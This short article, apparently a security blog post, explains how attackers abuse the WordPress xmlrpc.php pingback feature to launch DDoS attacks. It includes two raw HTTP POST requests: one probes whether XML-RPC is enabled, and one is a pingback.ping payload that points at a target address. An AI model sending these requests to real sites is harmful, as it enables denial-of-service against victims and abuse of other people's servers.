Distributed Denial of Service (DDoS) is one of the most lethal cyber-attacks that can paralyze the server by hitting it with hundreds and thousands of concurrent requests. Hackers use the pingback feature of WordPress along with the xmlrpc.php file to execute such attacks.

Ideally, the hacker targets the endpoint or a page that can be hit several times and takes longer to respond. This way a single hit can have a maximum impact on server resources and in our case, XMLRPC serves the hacker well in exposing such endpoints.

Several already compromised WordPress sites are used to execute the pingback. ping method to target a single victim. The overwhelming HTTP GET and POST requests jam the regular traffic and eventually crashes the server.

First, the hacker checks if the xmlrpc.php file is enabled or not by sending the following request.

POST /xmlrpc.php HTTP/1.1
Host: withinsecurity.com
Connection: keep-alive
Content-Length: 175

<?xml version="1.0" encoding="utf-8"?>
<methodCall>
<methodName>demo.sayHello</methodName>
<params>
<param>
<value>admin</value>
</param>
</params>
</methodCall>

Once it is confirmed that the XMLRPC is enabled on the target website, the attacker starts hitting it using the network of exploited sites to send multiple pingback requests to a victim site. This can be automated from multiple hosts and be used to cause a mass DDoS attack on the victim site.

POST /xmlrpc.php HTTP/1.1
Host: withinsecurity.com
Connection: keep-alive
Content-Length: 293

<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>http://173.244.58.36/</string></value>
</param>
<param>
<value><string>https://example.com/blog/how-to-make-a-salad</string></value>
</param>
</params>
</methodCall>